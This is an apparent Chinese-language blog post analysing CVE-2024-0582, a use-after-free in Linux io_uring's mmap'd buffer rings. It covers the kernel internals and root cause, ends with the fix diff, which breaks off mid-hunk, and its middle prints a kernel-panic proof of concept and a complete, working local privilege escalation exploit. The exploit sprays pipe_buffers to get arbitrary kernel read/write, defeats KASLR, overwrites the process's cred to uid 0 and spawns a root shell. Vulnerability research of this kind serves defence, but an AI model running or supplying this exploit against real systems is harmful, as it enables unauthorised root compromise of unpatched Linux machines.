0x00. 一切开始之前
CVE-2024-0582 是一个发生在 Linux kernel 的 io_uring 这一高性能异步 IO API 中的漏洞,得益于对使用 IORING_REGISTER_PBUF_RING
注册的 ring buffer 在 mmap()
映射的情况下存在可以在释放后仍被使用的 UAF 漏洞,攻击者可以通过该漏洞攻击内核以完成本地提权;该漏洞的 CVSS 分数为 7.8
,影响版本包括但不限于 6.4~6.6.5
,本文我们选用 6.4
版本的内核源码进行分析
在开始之前,我们简要介绍 IO_URING
相关的基础知识
io_uring 简介
io_uring 是自内核版本 5.1 引入的全新的高性能异步 I/O 框架,相比于 Linux 原有的 Native AIO 而言有着近乎跨越时代的性能提升,尤其是在延迟和 IOPS 的表现上已经远远超越了 AIO,达到了媲美 SPDK 的性能(参考了很多 SPDK 内部设计),是一项革命性的新技术
io_uring
的核心数据结构为两个单向环形队列:
- 提交队列(submission queue,SQ):请求提交方在该队列中放入 I/O 请求,由接收方取出请求进行处理
- 完成队列(completion queue,CQ):请求接收方在完成 I/O 请求后在该队列中放入处理结果,请求提交方通过读取该队列获取结果

io_uring
架构引入了三个新的系统调用:
io_uring_setup()
:创建 io_uring
上下文,主要是创建一个 SQ 队列与一个 CQ 队列,并指定 queue 的元素数量;该系统调用会返回一个文件描述符以供我们进行后续操作
io_uring_register()
:操作用于异步 I/O 的文件或用户缓冲区(files or user buffers),主要有注册(在内核中创建新的缓冲区)、更新(更新缓冲区内容)、注销(释放缓冲区)等操作,已经注册的缓冲区大小无法调整
io_uring_enter()
:提交新的 I/O 请求,可以选择是否等待 I/O 完成
PBUF_RING Internal
对于 io_uring_register()
,其系统调用原型如下:
SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)
在其核心逻辑的 __io_uring_register() 函数当中有一个大的 switch
来为不同的 opcode 调用不同的处理函数,我们主要关注于与 PBUF_RING
相关的部分
I. 注册:IORING_REGISTER_PBUF_RING
对于这个漏洞我们主要关注当 opcode == IORING_REGISTER_PBUF_RING
的情况,该 opcode 意味着注册一个环形缓冲区,其最终会调用到 io_register_pbuf_ring() 函数:
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl, *free_bl = NULL;
int ret;
if (copy_from_user(®, arg, sizeof(reg)))
return -EFAULT;
if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags & ~IOU_PBUF_RING_MMAP)
return -EINVAL;
if (!(reg.flags & IOU_PBUF_RING_MMAP)) {
if (!reg.ring_addr)
return -EFAULT;
if (reg.ring_addr & ~PAGE_MASK)
return -EINVAL;
} else {
if (reg.ring_addr)
return -EINVAL;
}
if (!is_power_of_2(reg.ring_entries))
return -EINVAL;
/* cannot disambiguate full vs empty due to head/tail size */
if (reg.ring_entries >= 65536)
return -EINVAL;
if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) {
int ret = io_init_bl_list(ctx);
if (ret)
return ret;
}
bl = io_buffer_get_list(ctx, reg.bgid);
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->is_mapped || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}
if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(®, bl);
else
ret = io_alloc_pbuf_ring(®, bl);
if (!ret) {
bl->nr_entries = reg.ring_entries;
bl->mask = reg.ring_entries - 1;
io_buffer_add_list(ctx, bl, reg.bgid);
return 0;
}
kfree(free_bl);
return ret;
}
略过各种参数检查等,我们主要关注其核心逻辑:
这里的子标志位主要用来指示 ring buffer 的分配者,若设置了 IOU_PBUF_RING_MMAP
意味着由内核分配环形缓冲区的内存,之后用户态应用使用 mmap()
映射以访问:
/*
* Flags for IORING_REGISTER_PBUF_RING.
*
* IOU_PBUF_RING_MMAP: If set, kernel will allocate the memory for the ring.
* The application must not set a ring_addr in struct
* io_uring_buf_reg, instead it must subsequently call
* mmap(2) with the offset set as:
* IORING_OFF_PBUF_RING | (bgid << IORING_OFF_PBUF_SHIFT)
* to get a virtual mapping for the ring.
*/
enum {
IOU_PBUF_RING_MMAP = 1,
};
若未设置该标志位,则意味着由用户态程序提供对应的页面,此时内核会调用 io_pin_pages() 并最终调用 pin_user_pages() 完成这一操作
因为我们的漏洞出现在和 mmap()
相关的路径上,因此我们主要关注调用 io_alloc_pbuf_ring() 这一路径,该最终会调用 __get_free_pages()
分配空闲页面:
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
size_t ring_size;
void *ptr;
ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
if (!ptr)
return -ENOMEM;
bl->buf_ring = ptr;
bl->is_mapped = 1;
bl->is_mmap = 1;
return 0;
}
分配的结构大概长这个样子:

II. 注销:IORING_UNREGISTER_PBUF_RING
有注册就有注销,有内存分配就有内存释放,注销 PBUF_RING
对应的 opcode 为 IORING_UNREGISTER_PBUF_RING
,内核会调用到 io_unregister_pbuf_ring() 进行处理:
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;
if (copy_from_user(®, arg, sizeof(reg)))
return -EFAULT;
if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags)
return -EINVAL;
bl = io_buffer_get_list(ctx, reg.bgid);
if (!bl)
return -ENOENT;
if (!bl->is_mapped)
return -EINVAL;
__io_remove_buffers(ctx, bl, -1U);
if (bl->bgid >= BGID_ARRAY) {
xa_erase(&ctx->io_bl_xa, bl->bgid);
kfree(bl);
}
return 0;
}
不难看出其核心逻辑为:
在看 __io_remove_buffers() 之前,我们首先回去看 io_alloc_pbuf_ring() ,注意到 io_buffer_list
这些成员的赋值:
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
/* ... */
bl->is_mapped = 1;
bl->is_mmap = 1;
因此在 __io_remove_buffers() 当中,我们会进入下面的路径将前面分配的页面释放掉:
static int __io_remove_buffers(struct io_ring_ctx *ctx,
struct io_buffer_list *bl, unsigned nbufs)
{
unsigned i = 0;
/* shouldn't happen */
if (!nbufs)
return 0;
if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
struct page *page;
page = virt_to_head_page(bl->buf_ring);
if (put_page_testzero(page))
free_compound_page(page);
bl->buf_ring = NULL;
bl->is_mmap = 0;
} /* ... */
}
在后面的版本中释放页面的逻辑会从使用 put_page_testzero()
换成 folio_put(virt_to_folio(bl->buf_ring));
,因此在修复该漏洞的 commit 当中你看到的是去除掉了 folio_put()
函数,但本质上的逻辑是一样的
III. 使用:io_uring_mmap
我们如何从用户空间访问 io_alloc_pbuf_ring() 分配的内存?内核通过 mmap()
为我们提供了一个方便快捷的途径,当我们对一个 io_uring
的 fd 使用 mmap()
进行映射时,内核最终会调用到 io_uring_mmap() 函数:
static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
size_t sz = vma->vm_end - vma->vm_start;
unsigned long pfn;
void *ptr;
ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
if (IS_ERR(ptr))
return PTR_ERR(ptr);
pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}
//...
static const struct file_operations io_uring_fops = {
.release = io_uring_release,
.mmap = io_uring_mmap,
在 io_uring_validate_mmap_request() 函数中首先会根据 mmap()
的 offset
参数判断具体操作,这里我们也可以看出对于 io_uring
而言 mmap()
的最后一个参数并非传统的用来表示偏移值,而是使用高位数据作为 mask 表示不同类型,低位存储具体数据,这里我们主要关注和 PBUF_RING
相关的分支:
static void *io_uring_validate_mmap_request(struct file *file,
loff_t pgoff, size_t sz)
{
struct io_ring_ctx *ctx = file->private_data;
loff_t offset = pgoff << PAGE_SHIFT;
struct page *page;
void *ptr;
/* Don't allow mmap if the ring was setup without it */
if (ctx->flags & IORING_SETUP_NO_MMAP)
return ERR_PTR(-EINVAL);
switch (offset & IORING_OFF_MMAP_MASK) {
case IORING_OFF_SQ_RING:
case IORING_OFF_CQ_RING:
ptr = ctx->rings;
break;
case IORING_OFF_SQES:
ptr = ctx->sq_sqes;
break;
case IORING_OFF_PBUF_RING: {
unsigned int bgid;
bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
mutex_lock(&ctx->uring_lock);
ptr = io_pbuf_get_address(ctx, bgid);
mutex_unlock(&ctx->uring_lock);
if (!ptr)
return ERR_PTR(-EINVAL);
break;
}
default:
return ERR_PTR(-EINVAL);
}
page = virt_to_head_page(ptr);
if (sz > page_size(page))
return ERR_PTR(-EINVAL);
return ptr;
}
io_pbuf_get_address 的逻辑就简单很多,主要就是取出我们前面分配的 buf_ring
:
void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)
{
struct io_buffer_list *bl;
bl = io_buffer_get_list(ctx, bgid);
if (!bl || !bl->is_mmap)
return NULL;
return bl->buf_ring;
}
0x01. 漏洞分析
Root Cause
我们其实不难看出漏洞出现在对内存所有权的严格管控,当我们将 bl->buf_ring
的内存通过 mmap()
映射出去之后, 居然仍旧能够直接通过 io_unregister_pbuf_ring 函数将这块内存给释放掉 ,由此我们先进行内存分配、再进行 mmap()
、最后再释放这块内存就直接有一个 UAF 了: 我们可以通过 mmap() 的内存区域直接读写释放掉的内内存页

Proof-Of-Concept
这里笔者给出自己写的 POC,主要就是利用 UAF 漏洞在 seq_file::seq_operations
里瞎写一通造成 kernel panic:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>
#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif
#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif
#define SUCCESSS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf(INFO_MSG(" Process binded to core: ") "%d\n", core);
}
struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;
memset(&buf_reg, 0, sizeof(buf_reg));
/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;
ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}
/**
[chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
**/
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);
if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}
*retp = 0;
return buf_ring;
}
#define NR_PAGES 1
#define NR_BUFFERS 0x100
#define SEQ_FILE_NR 0x200
void proof_of_concept(void)
{
struct io_uring ring;
void **buffers;
int seq_fd[SEQ_FILE_NR], found = 0;
int ret;
puts(SUCCESSS_MSG("-------- CVE-2024-0582 Proof-of-concet --------"));
puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
puts(SUCCESSS_MSG("-----------------------------------------------\n"));
puts(" Preparing...");
bind_core(0);
if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}
puts(" Allocating pbuf ring and doing mmap()...");
buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
io_uring_buf_ring_init(buffers[i]);
}
puts(" Triggering page-level UAF vulnerabilities...");
for (int i = 0; i < NR_BUFFERS; i++) {
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}
puts(" Reallocating page into seq_file::seq_operations...");
for (int i = 0; i < SEQ_FILE_NR; i++) {
if ((seq_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
printf(
ERR_MSG("[x] Unable to open") " No.%d "
ERR_MSG("seq file, error code: ") "%d\n",
i,
seq_fd[i]
);
exit(EXIT_FAILURE);
}
}
puts(" Checking data leak and overwriting...");
for (int i = 0; i < NR_BUFFERS; i++) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
if (buffer[j]>0xffffffff80000000 && buffer[j]<0xfffffffff0000000) {
printf(
SUCCESSS_MSG("[+] Got kernel data leak:") " %lx "
SUCCESSS_MSG("at location ") "%d-%d\n",
buffer[j],
i,
j
);
buffer[j] = *(uint64_t*) "arttnba3";
found = 1;
goto out;
}
}
}
if (!found) {
puts(ERR_MSG("[x] Failed to reallocate UAF page as seq_operations!"));
exit(EXIT_FAILURE);
}
out:
puts(" Triggering kernel panic...");
sleep(1);
for (int i = 0; i < SEQ_FILE_NR; i++) {
char buf[0x1000];
read(seq_fd[i], buf, 1);
}
puts("[?] So you're still alive here!?");
system("/bin/sh");
}
int main(int argc, char **argv, char **envp)
{
proof_of_concept();
return 0;
}
运行,成功造成 kernel panic:

0x02. 漏洞利用
这个 UAF 可谓是相当的白给,其来自于非常常见的分配 page 的 API,并且可以在用户空间直接读写 UAF page,所以利用方式基本上可以说是多种多样的, 可谓是想怎么利用就怎么利用,而且还特别稳定
这里笔者直接用 page-level UAF 通过改写 pipe_buffer::page
的方式获取内核空间任意读写的权能,之后直接改写当前进程的 cred
结构体完成提权:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>
#include <sys/prctl.h>
#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif
#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif
#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"
#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
uint64_t kernel_base, vmemmap_base, page_offset_base;
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf(INFO_MSG(" Process binded to core: ") "%d\n", core);
}
void err_exit(const char *fmt, ...)
{
va_list args;
int ret;
va_start(args, fmt);
printf(fmt, args);
va_end(args);
fflush(stdout);
fflush(stderr);
sleep(5);
exit(EXIT_FAILURE);
}
void get_root_shell(void)
{
if(getuid()) {
puts(ERR_MSG("[x] Failed to get the root!"));
sleep(5);
exit(EXIT_FAILURE);
}
puts(SUCCESS_MSG("[+] Successful to get the root."));
puts(INFO_MSG(" Execve root shell now..."));
system("/bin/sh");
/* to exit the process normally, instead of potential segmentation fault */
exit(EXIT_SUCCESS);
}
struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;
memset(&buf_reg, 0, sizeof(buf_reg));
/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;
ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}
/**
[chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
**/
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);
if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}
*retp = 0;
return buf_ring;
}
/**
* In my test environment, kmalloc-1k allocates from 4-page slub, so I chose 4.
* However, it might not be the same in your environment, e.g., it's 8 on my PC.
* Check your /proc/slabinfo before doing the exploitation.
*/
#define NR_PAGES 4
#define NR_BUFFERS 0x200
#define SEQ_FILE_NR 0x200
#define PIPE_SPRAY_NR 0x1F0
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
struct cred {
long usage;
uint32_t uid;
uint32_t gid;
uint32_t suid;
uint32_t sgid;
uint32_t euid;
uint32_t egid;
uint32_t fsuid;
uint32_t fsgid;
};
void read_kernel_page_by_pipe(struct page*page,struct pipe_buffer*kern_pipe_buf,
int pipe_fd[2], void *buf, size_t len)
{
kern_pipe_buf->page = page;
kern_pipe_buf->offset = 0;
kern_pipe_buf->len = 0xffe;
if (read(pipe_fd[0], buf, len) != len) {
perror(ERR_MSG("[x] Unable to do reading on pipe"));
exit(EXIT_FAILURE);
}
}
void write_kernel_page_by_pipe(struct page *page,
struct pipe_buffer*kern_pipe_buf,
int pipe_fd[2], void *buf, size_t len)
{
kern_pipe_buf->page = page;
kern_pipe_buf->offset = 0;
kern_pipe_buf->len = 0;
if (write(pipe_fd[1], buf, len) != len) {
perror(ERR_MSG("[x] Unable to do writing on pipe"));
exit(EXIT_FAILURE);
}
}
void exploit(void)
{
struct io_uring ring;
void **buffers;
struct pipe_buffer *kern_pipe_buffer = NULL;
uint64_t kernel_leak;
int pipe_fd[PIPE_SPRAY_NR][2], victim_idx = -1;
uint32_t uid, gid;
uint64_t cred_kaddr, cred_kpage_addr;
struct cred *cred_data;
char buf[0x1000];
int ret;
puts(SUCCESS_MSG("-------- CVE-2024-0582 Exploitation --------") "\n"
INFO_MSG("-------- Author: ")"arttnba3"INFO_MSG(" --------") "\n"
SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
bind_core(0);
puts(" Initializing io_uring ...");
if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}
puts(" Allocating pbuf ring and doing mmap() ...");
buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
io_uring_buf_ring_init(buffers[i]);
}
puts(" Triggering page-level UAF vulnerabilities ...");
for (int i = 0; i < NR_BUFFERS; i += 2) { /* we neeed "holes" */
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}
puts(" Reallocating pages as pipe_buffers ...");
for (int i = 0; i < PIPE_SPRAY_NR; i++) {
if ((ret = pipe(pipe_fd[i])) < 0) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pipe, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}
puts(" Allocating pipe_buffer::page ...");
for (int i = 0; i < PIPE_SPRAY_NR; i++) {
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
}
puts(" Checking for UAF mmap address ...");
for (int i = 0; i < NR_BUFFERS; i += 2) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
if (buffer[j] > 0xffff000000000000
&& buffer[j + 1] == 0x2000000000
&& buffer[j + 2] > 0xffffffff81000000) {
printf(
SUCCESS_MSG("[+] Got kernel pipe_buffer mapped at buffer:")
" %d-%d\n", i, j
);
printf(
INFO_MSG(" Leak pipe_buffer::page = ")"%lx\n", buffer[j]
);
printf(
INFO_MSG(" Leak pipe_buffer::ops = ")"%lx\n", buffer[j+2]
);
kern_pipe_buffer = (void*) &buffer[j];
goto out_find_pipe;
}
}
}
if (!kern_pipe_buffer) {
puts(ERR_MSG("[x] Failed to find kernel pipe_buffer in user space!"));
exit(EXIT_FAILURE);
}
out_find_pipe:
puts(" Overwriting victim pipe_buffer::page ...");
/* note that the granularity of KASLR is 256MB, i.e. 0x10000000*/
vmemmap_base = (uint64_t) kern_pipe_buffer->page & KASLR_MASK;
kern_pipe_buffer->page = (void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40);
for (int i = 0; i < PIPE_SPRAY_NR; i++) {
read(pipe_fd[i][0], &kernel_leak, sizeof(kernel_leak));
if (kernel_leak != *(uint64_t*) "arttnba3") {
printf(SUCCESS_MSG("[+] Got victim pipe at idx: ") "%d\n", i);
victim_idx = i;
break;
}
}
if (victim_idx == -1) {
puts(ERR_MSG("[x] Failed to find the victim pipe!"));
exit(EXIT_FAILURE);
}
for (uint64_t loop_nr = 0; 1; loop_nr++) {
if (kernel_leak > 0xffffffff81000000
&& (kernel_leak & 0xfff) < 0x100) {
kernel_base = kernel_leak & 0xfffffffffffff000;
if (loop_nr != 0) {
puts("");
}
printf(
INFO_MSG(" Leak secondary_startup_64 : ") "%lx\n",kernel_leak
);
printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
break;
}
for (int i = 0; i < 80; i++) {
putchar('\b');
}
printf(
"[No.%ld loop] Got unmatched data: %lx, keep looping...",
loop_nr,
kernel_leak
);
vmemmap_base -= KASLR_GRANULARITY;
read_kernel_page_by_pipe(
(void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40),
kern_pipe_buffer,
pipe_fd[victim_idx],
&kernel_leak,
sizeof(kernel_leak)
);
}
puts(" Finding task_struct of current process in kernel space ...");
prctl(PR_SET_NAME, "rat3bant");
uid = getuid();
gid = getgid();
for (int i = 0; 1; i++) {
uint64_t *comm_addr;
read_kernel_page_by_pipe(
(void*) (vmemmap_base + 0x40 * i),
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xff8
);
comm_addr = memmem(buf, 0xff0, "rat3bant", 8);
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-2] == comm_addr[-3])) { /* should be equal */
printf(
SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
(vmemmap_base + i * 0x40)
);
printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);
cred_kaddr = comm_addr[-2];
cred_data = (void*) (buf + (cred_kaddr & (PAGE_SIZE - 1)));
page_offset_base = cred_kaddr & KASLR_MASK;
while (1) {
cred_kpage_addr = vmemmap_base + \
(cred_kaddr - page_offset_base) / 0x1000 * 0x40;
read_kernel_page_by_pipe(
(void*) cred_kpage_addr,
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xffe
);
if (cred_data->uid == uid
&& cred_data->gid == gid) {
printf(
SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
cred_kpage_addr
);
break;
}
page_offset_base -= KASLR_GRANULARITY;
}
break;
}
}
puts(" Overwriting cred and granting root privilege...");
cred_data->uid = 0;
cred_data->gid = 0;
write_kernel_page_by_pipe(
(void*) cred_kpage_addr,
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xff0
);
setresuid(0, 0, 0);
setresgid(0, 0, 0);
get_root_shell();
}
int main(int argc, char **argv, char **envp)
{
exploit();
return 0;
}
运行即可完成提权,非常™稳定而且不依赖于特定的内核镜像:

0x03. 漏洞修复
这个漏洞最终在 这个 commit 当中被修复,修复方式是:
- 添加了一个记录延迟释放 buffer 的链表与对应结构
- 将 buffer 释放推迟到调用
->release()
时,而非原来的即时释放),从而在 mmap()
区域销毁后才会回收这部分内存
这个修改引入了更适用的架构,而且确乎避免了 UAF 的问题,在笔者看来还是比较成功的:
diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
index d3009d56af0ba3..805bb635cdf558 100644
--- a/include/linux/io_uring_types.h
+++ b/include/linux/io_uring_types.h
@@ -340,6 +340,9 @@ struct io_ring_ctx {
struct list_head io_buffers_cache;
+ /* deferred free list, protected by ->uring_lock */
+ struct hlist_head io_buf_list;
+
/* Keep this last, we don't need it for the fast path */
struct wait_queue_head poll_wq;
struct io_restriction restrictions;
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index e40b1143821045..3a216f0744dd66 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -325,6 +325,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
INIT_LIST_HEAD(&ctx->sqd_list);
INIT_LIST_HEAD(&ctx->cq_overflow_list);
INIT_LIST_HEAD(&ctx->io_buffers_cache);
+ INIT_HLIST_HEAD(&ctx->io_buf_list);
io_alloc_cache_init(&ctx->rsrc_node_cache, IO_NODE_ALLOC_CACHE_MAX,
sizeof(struct io_rsrc_node));
io_alloc_cache_init(&ctx->apoll_cache, IO_ALLOC_CACHE_MAX,
@@ -2950,6 +2951,7 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
ctx->mm_account = NULL;
}
io_rings_free(ctx);
+ io_kbuf_mmap_list_free(ctx);
percpu_ref_exit(&ctx->refs);
free_uid(ctx->user);
diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
index a1e4239c7d75d1..85e680fc74ce2c 100644
--- a/io_uring/kbuf.c
+++ b/io_uring/kbuf.c
@@ -33,6 +33,11 @@ struct io_provide_buf {
__u16 bid;
};
+struct io_buf_free {
+ struct hlist_node list;
+ void *mem;
+};
+
static inline struct io_buffer_list *io_buffer_get_list(struct io_ring_ctx *ctx,
unsigned int bgid)
{
@@ -223,7 +228,10 @@ static int __io_remove_buffers(struct io_ring_ctx *ctx,
if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
- folio_put(virt_to_folio(bl->buf_ring));
+ /*
+ * io_kbuf_list_free() will free the page(s) at
+ * ->release() time.
+ */
bl->buf_ring = NULL;
bl->is_mmap = 0;
} else if (bl->buf_nr_pages) {
@@ -531,18 +539,28 @@ error_unpin:
return -EINVAL;
}
-static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
+static int io_alloc_pbuf_ring(struct io_ring_ctx *ctx,
+ struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
- gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
+ struct io_buf_free *ibf;
size_t ring_size;
void *ptr;
ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
- ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
+ ptr = io_mem_alloc(ring_size);
if (!ptr)
return -ENOMEM;
+ /* Allocate and store deferred free entry */
+ ibf = kmalloc(sizeof(*ibf), GFP_KERNEL_ACCOUNT);
+ if (!ibf) {
+ io_mem_free(ptr);
+ return -ENOMEM;
+ }
+ ibf->mem = ptr;
+ hlist_add_head(&ibf->list, &ctx->io_buf_list);
+
bl->buf_ring = ptr;
bl->is_mapped = 1;
bl->is_mmap = 1;
@@ -599,7 +617,7 @@ int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
